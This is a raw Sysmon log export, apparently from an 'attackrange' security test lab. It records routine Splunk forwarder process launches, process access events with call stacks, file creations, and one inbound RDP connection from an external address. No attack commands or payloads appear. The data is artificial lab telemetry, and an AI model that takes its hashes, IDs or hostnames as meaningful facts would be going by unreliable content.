08:01:52.201{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.180{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:52.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3869E49FAEE5370C2CA63D6F87E03CD5,SHA256=EF55E064A968C5F3AE9F628F27A0DA05F5ACD60196B1CE9B1A4CC7E23D911D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:52.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3943555B50D3DEEDF48BE269530AE6FC,SHA256=1B0DF9BB4386E7C482372406560493B4A19856F46634374068E4519336D21BDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:50.861{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-1456-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001052507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C36EDEC68C00693CE59F7FD29BE69E5,SHA256=EC9FEC28645A5E5FCA0CA819F8C3F0F7A05A2A0427D62A01BC95426C6C2C2F08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.865{466BC892-F6F1-60EB-B37D-00000000CF01}56049436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.688{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4CED47071040FF4E6A37B7CEB41C7D7,SHA256=DC39409505E697E0159EA85354860F01D727F2D9CFB09FC773A5C36B7CBF047E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:53.364{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038652CB3964751B0737B4FA21D44542,SHA256=C47D066258591EC05AB3A02AC6A2BB4511659C6303784168EA6544BD9393CCF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.547{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.531{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.531{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.531{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.531{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.532{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:51.371{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57387-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:46.597{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51164-false10.0.1.12-8000- 23542300x80000000000000001052516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.708{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E1E33F62EE7CFB11A79A1115488CF4,SHA256=4FD77B4DB2276731CF3A0C15CCD9BD871A2966057FEEDCDAB5E1085AF60BCB14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:54.379{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA52889D67CF24AC90DBB05295F3325B,SHA256=C5CFB7E3CEC8E223BD741DF959FA3997CB0B10A0605A942B31DA8F4E4749304F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 